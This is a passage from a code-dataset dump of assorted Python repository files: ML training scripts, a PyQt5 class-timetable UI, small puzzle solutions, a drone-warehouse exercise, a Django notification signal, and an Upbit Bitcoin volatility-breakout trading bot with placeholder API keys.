result_logger.add_test_metrics(targets.numpy(), predicts.numpy(), probs.numpy(), time=batch_time.sum)\n return top1.avg\n\n\ndef save_checkpoint(state, is_best, best_filename='checkpoint.pth', logdir=None):\n path = os.path.join(logdir if logdir is not None else os.getcwd(), best_filename)\n torch.save(state, path)\n if is_best:\n best_filename = 'fc_best_ep{:03d}_acc{:.2f}.pth'.format(state['epoch'], state['best_acc1'])\n shutil.copyfile(path, os.path.join(logdir, best_filename))\n\n\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\nnew_size, crop_size = args.new_size, args.crop_size\nbatch_size = args.batch_size\ntransform = transforms.Compose([\n transforms.Resize((new_size, new_size)),\n transforms.CenterCrop(crop_size),\n transforms.ToTensor(),\n normalize,\n])\ntrain_dataset = get_dataset(args.data, root=args.datadir, train=True, transform=transform)\nval_dataset = get_dataset(args.data, root=args.datadir, train=False, transform=transform)\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\n\nval_loader = torch.utils.data.DataLoader(\n val_dataset,\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\nnum_classes = args.num_classes = get_dataset_class_number(args.data)\n\nif args.arch == 'resnet_vae3':\n from models.ResNetVAE3 import ResNet_VAE_encoder\n from models.ResNetVAE3 import ResNet_VAE_decoder\n\n encoder = ResNet_VAE_encoder(h_dim=args.h_dim, pretrained=args.pretrained)\n decoder = ResNet_VAE_decoder(num_classes, h_dim=args.h_dim, z_dim=args.z_dim, img_size=args.crop_size)\n net = Network3\nelse:\n raise NotImplementedError\nmodel = net(encoder, decoder, num_classes, args.h_dim, args.z_dim, generative=args.generative, mlp_dim=None)\n\nif os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume, map_location='cpu')\n state_dict = {k[7:]: v for k, v in checkpoint['state_dict'].items()} # remove \"module.\" prefix in keys\n\n model.load_state_dict(state_dict)\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n\n# load weight\ntorch.cuda.set_device(args.gpu)\nmodel = model.cuda(args.gpu)\ntrain_mus, train_logvars, train_target = get_data(train_loader, model, args)\ntest_mus, test_logvars, test_target = get_data(val_loader, model, args)\n\nmodel = model.classifier\nrep_nums, class_cnts = get_rep_nums(train_dataset)\n# train_mus, train_logvars, train_target = augment_data(train_mus, train_logvars, train_target, rep_nums, class_cnts)\n\ntrain_loader = torch.utils.data.DataLoader(\n RepeatedDataset(train_mus, train_logvars, train_target, rep_nums, class_cnts),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=True)\nval_loader = torch.utils.data.DataLoader(\n TensorDataset(test_mus, test_logvars, test_target), batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n\ntrain_class_count = train_dataset.get_class_count()\ntest_class_count = val_dataset.get_class_count()\nresult_logger = ResultLogger('metrics_aug', args.num_classes, train_class_count, test_class_count,\n args.logdir, verbose=False)\n\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=args.lr_step, gamma=args.gamma)\n\nfor epoch in range(args.start_epoch, args.epochs):\n train_classifier(train_loader, model, criterion, optimizer, args, epoch, result_logger)\n acc1 = validate(val_loader, model, criterion, args, epoch, result_logger)\n\n scheduler.step()\n is_best = acc1 > best_acc1\n best_acc1 = max(acc1, best_acc1)\n\n result_logger.save_metrics()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'best_acc1': best_acc1,\n 'optimizer': optimizer.state_dict(),\n }, is_best, logdir=args.logdir)\n\nprint(best_acc1)\n","repo_name":"xinyuewangg/DGCMM","sub_path":"augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":15773,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} +{"seq_id":"20591285156","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QWidget\nfrom setting import WIDTH, HEIGHT\nimport os\n\n\nclass MainPage(QWidget):\n switch_window_to_log = QtCore.pyqtSignal()\n switch_window_to_preview = QtCore.pyqtSignal()\n switch_window_to_login = QtCore.pyqtSignal()\n\n def setupUi(self, MainForm):\n path = os.path.dirname(os.path.abspath(__file__))\n self.resize(WIDTH, HEIGHT)\n\n self.back_1 = QtWidgets.QLabel(MainForm)\n self.back_1.setGeometry(QtCore.QRect(0, 0, 300, 611))\n self.back_1.setStyleSheet(\"border:5px;\\n\"\n\"background-color:rgb(38, 55, 71)\\n\")\n\n self.back_2 = QtWidgets.QLabel(MainForm)\n self.back_2.setGeometry(QtCore.QRect(300, 0, 500, 600))\n self.back_2.setStyleSheet(\"background:rgb(255, 255, 255);\")\n\n self.stImg = QtWidgets.QLabel(MainForm)\n self.stImg.setGeometry(QtCore.QRect(40, 120, 220, 190))\n self.stImg.setStyleSheet(\"border-radius : 30%;\")\n self.stImg.setPixmap(QtGui.QPixmap(os.path.join(path, 'Img/inseong.png')))\n self.stImg.setScaledContents(True)\n\n\n self.stName = QtWidgets.QTextBrowser(MainForm)\n self.stName.setGeometry(QtCore.QRect(90, 390, 141, 41))\n self.stName.setStyleSheet(\"background-color:rgb(38, 55, 71);\\n\"\n\"color:rgb(255, 255, 255);\\n\"\n\"font: 14pt \\\"HY견고딕\\\";\\n\"\n\"border : 0;\")\n\n\n self.stNum = QtWidgets.QTextBrowser(MainForm)\n self.stNum.setGeometry(QtCore.QRect(60, 340, 221, 41))\n self.stNum.setStyleSheet(\"background-color:rgb(38, 55, 71);\\n\"\n\"color:rgb(255, 255, 255);\\n\"\n\"font: 14pt \\\"HY견고딕\\\";\\n\"\n\"border : 0;\")\n\n\n self.showLog = QtWidgets.QPushButton(MainForm)\n self.showLog.setGeometry(QtCore.QRect(10, 20, 131, 31))\n self.showLog.setStyleSheet(\"background-color : rgb(0, 123, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-radius: 10px;\\n\"\n\"color: rgb(255, 255, 255);\\n\"\n\"font: bold 10pt \\\"Hancom Gothic\\\";\\n\"\n\"\\n\"\n\"\\n\"\n\"\")\n self.showLog.clicked.connect(self.switch_log_page)\n\n self.logoutBtn = QtWidgets.QPushButton(MainForm)\n self.logoutBtn.setGeometry(QtCore.QRect(85, 430, 130, 30))\n self.logoutBtn.setStyleSheet(\"background-color : rgb(0, 123, 255);\\n\"\n \"border-style:outset;\\n\"\n \"border-radius: 10px;\\n\"\n \"color: rgb(255, 255, 255);\\n\"\n \"font: bold 10pt \\\"Hancom Gothic\\\";\\n\"\n \"\\n\"\n \"\\n\"\n \"\")\n self.logoutBtn.clicked.connect(self.switch_login_page)\n\n\n self.class_1 = QtWidgets.QPushButton(MainForm)\n self.class_1.setGeometry(QtCore.QRect(330, 20, 450, 90))\n self.class_1.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_1.clicked.connect(self.switch_preview_page)\n\n\n self.class_2 = QtWidgets.QPushButton(MainForm)\n self.class_2.setGeometry(QtCore.QRect(330, 130, 450, 90))\n self.class_2.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_2.clicked.connect(self.switch_preview_page)\n\n\n self.class_3 = QtWidgets.QPushButton(MainForm)\n self.class_3.setGeometry(QtCore.QRect(330, 240, 450, 90))\n self.class_3.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_3.clicked.connect(self.switch_preview_page)\n\n self.class_4 = QtWidgets.QPushButton(MainForm)\n self.class_4.setGeometry(QtCore.QRect(330, 350, 450, 90))\n self.class_4.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_4.clicked.connect(self.switch_preview_page)\n\n self.class_5 = QtWidgets.QPushButton(MainForm)\n self.class_5.setGeometry(QtCore.QRect(330, 460, 450, 90))\n self.class_5.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_5.clicked.connect(self.switch_preview_page)\n\n\n self.label = QtWidgets.QLabel(MainForm)\n self.label.setGeometry(QtCore.QRect(340, 36, 5, 60))\n self.label.setStyleSheet(\"background-color:rgb(255, 181, 53);\")\n\n self.label_2 = QtWidgets.QLabel(MainForm)\n self.label_2.setGeometry(QtCore.QRect(340, 370, 5, 60))\n self.label_2.setStyleSheet(\"background-color:rgb(127, 42, 231)\")\n\n self.label_3 = QtWidgets.QLabel(MainForm)\n self.label_3.setGeometry(QtCore.QRect(340, 150, 5, 60))\n self.label_3.setStyleSheet(\"background-color:rgb(239, 9, 70)\")\n\n self.label_4 = QtWidgets.QLabel(MainForm)\n self.label_4.setGeometry(QtCore.QRect(340, 260, 5, 60))\n self.label_4.setStyleSheet(\"background-color:rgb(122, 255, 51)\")\n\n self.label_5 = QtWidgets.QLabel(MainForm)\n self.label_5.setGeometry(QtCore.QRect(340, 480, 5, 60))\n self.label_5.setStyleSheet(\"background-color:rgb(255, 241, 38)\")\n\n self.back_2.raise_()\n self.back_1.raise_()\n self.stImg.raise_()\n self.stNum.raise_()\n self.stName.raise_()\n self.showLog.raise_()\n self.logoutBtn.raise_()\n self.class_1.raise_()\n self.label.raise_()\n self.class_2.raise_()\n self.class_3.raise_()\n self.class_4.raise_()\n self.class_5.raise_()\n self.label_2.raise_()\n self.label_3.raise_()\n self.label_4.raise_()\n self.label_5.raise_()\n\n self.retranslateUi(MainForm)\n QtCore.QMetaObject.connectSlotsByName(MainForm)\n\n def retranslateUi(self, MainForm):\n _translate = QtCore.QCoreApplication.translate\n MainForm.setWindowTitle(_translate(\"MainForm\", \"Main Page\"))\n self.stName.setHtml(_translate(\"MainForm\", \"\\n\"\n\"\\n\"\n\"

유인성 님

\"))\n self.stNum.setHtml(_translate(\"MainForm\", \"\\n\"\n\"\\n\"\n\"

1 2 1 8 1 6 8 9

\"))\n\n self.showLog.setText(_translate(\"MainForm\", \"알림내역 보기\"))\n self.logoutBtn.setText(_translate(\"MainForm\", \"Log out\"))\n self.class_1.setText(_translate(\"MainForm\", \" 자바 기반 응용 프로그래밍 | A.M. 10:00\"))\n self.class_2.setText(_translate(\"MainForm\", \" 인터넷 프로그래밍 | P.M. 6:00\"))\n self.class_3.setText(_translate(\"MainForm\", \" 초급 스페인어 | A.M. 9:50\"))\n self.class_4.setText(_translate(\"MainForm\", \" 어셈블리어 | A.M. 11:00\"))\n self.class_5.setText(_translate(\"MainForm\", \" 댄스 스포츠 | A.M. 10:00\"))\n\n def switch_log_page(self):\n self.switch_window_to_log.emit()\n\n def switch_preview_page(self):\n self.switch_window_to_preview.emit()\n\n def switch_login_page(self):\n self.switch_window_to_login.emit()\n","repo_name":"Ro4z/POOC","sub_path":"src/page/MainPage.py","file_name":"MainPage.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"1685981295","text":"import os\nimport argparse\nimport numpy as np\nimport tensorflow as tf\n\n# standard resnet block\ndef residual_block(x, filters, projection):\n x_skip = x \n\n # layer 1\n if projection:\n x = tf.keras.layers.Conv2D(filters, (3, 3), (2,2), padding='same', kernel_initializer='he_normal')(x)\n else:\n x = tf.keras.layers.Conv2D(filters, (3, 3), (1,1), padding='same', kernel_initializer='he_normal')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n\n # layer 2\n x = tf.keras.layers.Conv2D(filters, (3, 3), (1,1), padding='same', kernel_initializer='he_normal')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n\n # addition\n if projection:\n x_skip = tf.keras.layers.Conv2D(filters, (1, 1), (2,2), padding='valid', kernel_initializer='he_normal')(x_skip)\n x = tf.keras.layers.Add()([x, x_skip])\n x = tf.keras.layers.Activation('relu')(x)\n\n return x\n\n# configured for resnet-20\ndef resnet20(shape_in, classes):\n # input and initial convolution\n x_in = tf.keras.layers.Input(shape_in)\n x = tf.keras.layers.Conv2D(16, (3, 3), (1,1), padding='same', kernel_initializer='he_normal')(x_in)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n\n # residual blocks\n filters = [16, 32, 64]\n for i in range(3):\n for j in range(3):\n if i > 0 and j == 0:\n x = residual_block(x, filters[i], projection=True)\n else:\n x = residual_block(x, filters[i], projection=False)\n\n # final dense layer and model \n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Flatten()(x)\n x_out = tf.keras.layers.Dense(classes, kernel_initializer='he_normal')(x)\n model = tf.keras.models.Model(x_in, x_out, name='ResNet20')\n\n return model\n\nif __name__ == \"__main__\":\n # parse args\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', type=str, help='Specify model to use', choices=['vgg16', 'resnet20', 'convnet'], required=True)\n parser.add_argument('--dataset', type=str, help='Specify medmnist dataset to use', choices=['pathmnist', 'octmnist', 'tissuemnist'], required=True)\n parser.add_argument('--gpu', type=int, help='Specify gpu index to use', required=False)\n args = parser.parse_args()\n\n # set gpu index if specified \n if args.gpu is not None:\n os.environ['CUDA_VISIBLE_DEVICES'] = f'{args.gpu}'\n os.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n \n # create model dir if not yet created\n if not os.path.exists(os.path.join(os.getcwd(), 'models')):\n os.makedirs(os.path.join(os.getcwd(), 'models'))\n\n # load dataset\n dataset = np.load(f'{args.dataset}.npz')\n dataset = dict(dataset)\n\n # add axis if greyscale\n # define input_shape\n if len(dataset['train_images'].shape) == 3:\n input_shape = (28, 28, 1)\n dataset['train_images'] = dataset['train_images'][..., np.newaxis]\n dataset['val_images'] = dataset['val_images'][..., np.newaxis]\n dataset['test_images'] = dataset['test_images'][..., np.newaxis]\n else:\n input_shape = (28, 28, 3)\n\n # define classes\n if args.dataset == 'pathmnist':\n classes = 9\n elif args.dataset == 'octmnist':\n classes = 4\n elif args.dataset == 'tissuemnist':\n classes = 8\n \n # compile model\n if args.model == 'resnet20': \n model = resnet20(input_shape, classes)\n elif args.model == 'vgg16': \n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Input(input_shape))\n for idx, filter in enumerate([64, 128, 256, 512, 512]):\n model.add(tf.keras.layers.Conv2D(filter, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'))\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.Dropout(0.25))\n if idx > 1:\n model.add(tf.keras.layers.Conv2D(filter, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'))\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.Dropout(0.25))\n model.add(tf.keras.layers.Conv2D(filter, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'))\n model.add(tf.keras.layers.BatchNormalization())\n if idx < 4:\n model.add(tf.keras.layers.MaxPool2D((2,2),(2,2)))\n else:\n model.add(tf.keras.layers.Dropout(0.25))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(512, activation='relu', kernel_initializer='he_normal'))\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.Dropout(0.25))\n model.add(tf.keras.layers.Dense(classes, activation=None, kernel_initializer='he_normal'))\n elif args.model == 'convnet': \n model = tf.keras.Sequential([\n tf.keras.layers.Input(input_shape),\n \n tf.keras.layers.Conv2D(32, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Conv2D(32, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.MaxPool2D(pool_size=(2,2)),\n\n tf.keras.layers.Conv2D(64, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Conv2D(64, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.MaxPool2D(pool_size=(2,2)),\n\n tf.keras.layers.Conv2D(128, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Conv2D(128, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.MaxPool2D(pool_size=(2,2)),\n\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.25),\n tf.keras.layers.Dense(1024, kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Dropout(0.25),\n tf.keras.layers.Dense(512, kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Dropout(0.25),\n tf.keras.layers.Dense(classes, kernel_initializer='he_normal', activation=None),\n ])\n optim = tf.keras.optimizers.Adam(lr=0.001)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n model.compile(optimizer=optim, loss=loss, metrics=['accuracy'])\n model.summary()\n\n # train model\n lr_scheduler = tf.keras.callbacks.LearningRateScheduler(\n lambda epoch, lr: lr*0.1 if epoch == 50 or epoch == 75 else lr\n )\n tensorboard = tf.keras.callbacks.TensorBoard(\n log_dir=os.path.join(os.getcwd(), 'logs', f'{args.dataset}_{args.model}'),\n )\n # checkpoint = tf.keras.callbacks.ModelCheckpoint(\n # os.path.join(os.getcwd(), 'models', f'model_{args.dataset}_{args.model}.h5'),\n # monitor='val_accuracy',\n # verbose=1,\n # save_best_only=True,\n # save_weights_only=False,\n # mode='max',\n # )\n model.fit(\n dataset['train_images']/255.0,\n dataset['train_labels'],\n batch_size=128,\n epochs=100,\n verbose=1,\n callbacks=[lr_scheduler, tensorboard],\n validation_data=(dataset['val_images']/255.0, dataset['val_labels']),\n shuffle=True,\n )\n model.save(os.path.join(os.getcwd(), 'models', f'model_{args.dataset}_{args.model}.h5'))\n\n # load and eval best model\n model = tf.keras.models.load_model(\n os.path.join(os.getcwd(), 'models', f'model_{args.dataset}_{args.model}.h5')\n )\n score = model.evaluate(\n dataset['test_images']/255.0,\n dataset['test_labels'],\n batch_size=128,\n verbose=1,\n )\n print(f\"Test loss: {score[0]} - Test acc: {score[1]}\")\n np.save(os.path.join(os.getcwd(), 'logs', f'{args.dataset}_{args.model}', 'score.npy'), score)","repo_name":"rajfly/MedMNIST","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"73426164427","text":"from collections import Counter\r\n\r\ndef main():\r\n lines = []\r\n with open('temp.txt') as f:\r\n lines = f.readlines()\r\n\r\n lines = [s.strip() for s in lines]\r\n\r\n length = len(lines[0])\r\n part1 = \"\"\r\n for i in range(length):\r\n string = \"\"\r\n for line in lines:\r\n string += line[i]\r\n\r\n dict = Counter(string)\r\n part1 += max(dict, key=dict.get)\r\n\r\n print(f\"Part 1: {part1}\")\r\n\r\n part2 = \"\"\r\n for i in range(length):\r\n string = \"\"\r\n for line in lines:\r\n string += line[i]\r\n\r\n dict = Counter(string)\r\n part2 += min(dict, key=dict.get)\r\n\r\n print(f\"Part 2: {part2}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"EGTB724/AdventOfCode2016","sub_path":"Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"39825987494","text":"import collections\nimport heapq\nclass Solution:\n def bestTaskSequence(self, tasks, intervals):\n mp = collections.defaultdict(int)\n for i in tasks:\n mp[i] += 1\n pq = []\n res = []\n for i in (mp.keys()):\n tp = [-mp[i], i]\n heapq.heappush(pq, tp)\n while len(pq):\n length = intervals\n tmppq = []\n while length > 0 and len(pq):\n length -= 1\n tp = heapq.heappop(pq)\n res.append(tp[1])\n tp[0] += 1\n if tp[0] == 0:\n continue\n tmppq.append(tp)\n while len(tmppq):\n heapq.heappush(pq, tmppq.pop(0))\n return res\nobj = Solution()\ntasks = ['1', '2', '3', '2', '1', '1', '4', '3', '3', '1']\nintervals = 3\nprint(obj.bestTaskSequence(tasks, intervals))","repo_name":"KJSui/leetcode-2020","sub_path":"cruise-interview.py","file_name":"cruise-interview.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"15786127310","text":"from drone import Drone\nfrom order import Order\nfrom map import Map\n\n\nclass Warehouse:\n def __init__(self, name: str, drone_number: list, neighbourhood: str):\n self.name = name\n self.drone_number = drone_number\n self.neighbourhood = neighbourhood\n\n # The list of drones of the warehouse, created by a method:\n self.drone_list = self.create_drones(drone_number)\n # The list of orders coming in:\n self.orders = []\n\n # Objects needed\n self.map = Map(self.neighbourhood, [])\n\n # properties and setters\n\n # For name variable: Must be a str, can be seen and edited\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, name):\n if type(name) != str:\n raise TypeError(\"Name must be a str\")\n else:\n self.__name = name\n\n # For drones: List, can be seen and edited\n\n @property\n def drone_number(self):\n return self.drone_number\n\n @drone_number.setter\n def drone_number(self, drone_number):\n if type(drone_number) != list:\n raise TypeError(\"Drones must be a list\")\n else:\n self.drone_number = drone_number\n\n # For neighbourhood: Str, can be seen and edited\n\n @property\n def neighbourhood(self):\n return self.__neighbourhood\n\n @neighbourhood.setter\n def neighbourhood(self, neighbourhood):\n if type(neighbourhood) != str:\n raise TypeError(\"Name must be a str\")\n else:\n self.__neighbourhood = neighbourhood\n\n # METHODS OF THE WAREHOUSE CLASS\n\n def create_drones(self, drone_number):\n drone_list = []\n for i in range(drone_number):\n drone_list.append(Drone(f\"drone{i}\"))\n return drone_list\n\n # Creates the list of orders, it creates this list ordered\n def insert_order_in_list(self, order: Order):\n # If the list is not empty we can add normally\n if len(self.orders) != 0:\n insert_index = len(self.orders)\n # If it is empty, we add at index 0: Add the first element\n else:\n insert_index = 0\n # We check for every element in the list of orders: We start at the end, if the element to the left is smaller\n # (priority) than the one we are comparing, we move the one comparing one to the left. We do that until there\n # are no smaller priority orders\n for i in range(len(self.orders)):\n if self.orders[insert_index - 1].priority < order.priority:\n insert_index -= 1\n # When we finish changing the index, we insert the order into the list\n self.orders.insert(insert_index, order)\n\n # Returns a tuple with a drone id suited for the address specified and the distance to that address\n def pick_drone(self, order_address: str):\n # Choose the drone for the order_address\n # The fist available one is chosen by looking at the list from start to finish\n for i in range(len(self.drone_list)):\n if self.drone_list[i].power == 2 * self.map.compute_distance(self.name, order_address):\n return_tuple = (self.drone_list[i].id, self.map.compute_distance((self.name, order_address)))\n return return_tuple\n\n # Else we charge the drone to it`s max power\n self.drone_list[0].power = 100\n # We create a different return dictionary and return it\n return_tuple = (self.drone_list[0].id, self.map.compute_distance((self.name, order_address)))\n\n return return_tuple\n\n def process_order(self, order):\n self.orders.append(order)\n for i in range(len(self.drone_list)):\n if self.drone_list[i].id == self.pick_drone(order.address)[0]:\n drone = self.drone_list[i]\n drone.status = \"busy\"\n drone.order = order\n else:\n print(\"No drone with the id required\")\n","repo_name":"Albrtito/UC3M_Programming_Exercises","sub_path":"Final exam preparation/final-exams-cs/19-20 January/warehouse.py","file_name":"warehouse.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"41369213681","text":"from django.db.models.signals import m2m_changed\nfrom django.dispatch import receiver\nfrom django.template.loader import render_to_string\nfrom .models import Post, Category\nfrom .tasks import news_mail\n\n@receiver(m2m_changed, sender=Post.categories.through)\ndef notify_subscribers(instance, action, pk_set, *args, **kwargs):\n if action == 'post_add':\n html_content = render_to_string(\n 'post_created_letter.html',\n {'post': instance}\n )\n for pk in pk_set:\n category = Category.objects.get(pk=pk)\n recipients = [user.email for user in category.subscribers.all()]\n subject=f'На сайте NewsPortal появилась новая статья: {instance.post_title}'\n from_email='olga-olechka-5@yandex.ru'\n news_mail.delay(subject, from_email, recipients, html_content)\n \n","repo_name":"OlgaAlekhina/NewsPortal-Redis-","sub_path":"NewsPortal/news/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20770014045","text":"import time\nimport pyupbit\nimport datetime\nimport requests\n\naccess = \"your access\" # API\nsecret = \"your secret\" # API\nmyToken = \"your token\" # slack token\n\ndef post_message(token, channel, text):\n \"\"\"슬랙 메시지 전송\"\"\"\n response = requests.post(\"https://slack.com/api/chat.postMessage\",\n headers={\"Authorization\": \"Bearer \" + token},\n data={\"channel\": channel, \"text\": text}\n )\n\ndef get_target_price(ticker, k):\n \"\"\"변동성 돌파 전략으로 매수 목표가 조회\"\"\"\n df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=2)\n target_price = df.iloc[0]['close'] + (df.iloc[0]['high'] - df.iloc[0]['low']) * k\n return target_price\n\ndef get_start_time(ticker):\n \"\"\"시작 시간 조회\"\"\"\n df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=1)\n start_time = df.index[0]\n return start_time\n\ndef get_ma5(ticker):\n \"\"\"5일 이동 평균선 조회\"\"\"\n df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=5)\n ma5 = df['close'].rolling(5).mean().iloc[-1]\n return ma5\n\ndef get_balance(ticker):\n \"\"\"잔고 조회\"\"\"\n balances = upbit.get_balances()\n for b in balances:\n if b['currency'] == ticker:\n if b['balance'] is not None:\n return float(b['balance'])\n else:\n return 0\n return 0\n\ndef get_current_price(ticker):\n \"\"\"현재가 조회\"\"\"\n return pyupbit.get_orderbook(tickers=ticker)[0][\"orderbook_units\"][0][\"ask_price\"]\n\ndef get_buying_ratio(ticker, risk):\n \"\"\"구매 비중 구하기\"\"\"\n df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=2)\n range_ratio = (df.iloc[0]['high'] - df.iloc[0]['low'])/df.iloc[0]['close']\n buying_ratio = risk/range_ratio\n ratio = min([1, round(buying_ratio, 2)])\n return ratio\n\n# 로그인\nupbit = pyupbit.Upbit(access, secret)\nprint(\"autotrade start\") # 날짜가 바뀌면 매일 아침 시작 알림 띄우기하자\npost_message(myToken,\"#coin\", \"Autotrade start\")\n\n# 값초기화\nbuy_result, daily_msg, sell_result = None, None, None\n\n# 자동매매 시작\nwhile True:\n try:\n now = datetime.datetime.now()\n start_time = get_start_time(\"KRW-BTC\") # 9:00\n end_time = start_time + datetime.timedelta(days=1) # 9:00 + 1일\n ratio = get_buying_ratio(\"KRW-BTC\", 0.02)\n\n if start_time < now < end_time - datetime.timedelta(seconds=60):\n target_price = get_target_price(\"KRW-BTC\", 0.5)\n ma5 = get_ma5(\"KRW-BTC\")\n current_price = get_current_price(\"KRW-BTC\")\n daily_msg, sell_result = None, None # 각 초기화해주고\n if target_price < current_price and ma5 < current_price:\n budget = get_balance(\"KRW\") * ratio # 잔고에 구매 비중을 곱한 금액만큼만 살것임 (구매 예산)\n # 구매 예산이 5천 이상이고, buy_result가 None 또는 error 일때만\n if budget > 5000 and (buy_result is None or 'error' in buy_result):\n buy_result = upbit.buy_market_order(\"KRW-BTC\", budget*0.9995)\n post_message(myToken, \"#coin\", \"BTC buy : \" +str(buy_result))\n\n else:\n btc = get_balance(\"BTC\")\n buy_result = None # buy에서 에러 발생시 다음날 되면 buy_result를 초기화 해줘야함. sell 구분 뒤에 있음 에러 났을 경우 안팔리므로 실행 안됨\n # BTC가 5천원 이상이고, sell_result가 None 또는 error 일때만\n if btc > 0.00008 and (sell_result is None or 'error' in sell_result):\n sell_result = upbit.sell_market_order(\"KRW-BTC\", btc)\n post_message(myToken, \"#coin\", \"BTC sell : \" + str(sell_result))\n # 프로그램 가동중임을 알리는 알람\n if daily_msg is None:\n post_message(myToken, \"#coin\", \"program is running\")\n daily_msg = \"On\"\n time.sleep(1)\n except Exception as e:\n print(e)\n post_message(myToken, \"#coin\", e)\n time.sleep(1)\n","repo_name":"duhyunkang/AutoTrade","sub_path":"BitcoinAutoTrading_git.py","file_name":"BitcoinAutoTrading_git.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"22270178628","text":"\"\"\"!\n\\file config_validation.py\n\n\\brief Validate that the required parameters are present in the configuration file\n\"\"\"\n\nimport warnings\nfrom . import structures as struc\nfrom pathlib import Path\n\n\ndef check_parameters_are_present(configuration, is_image):\n 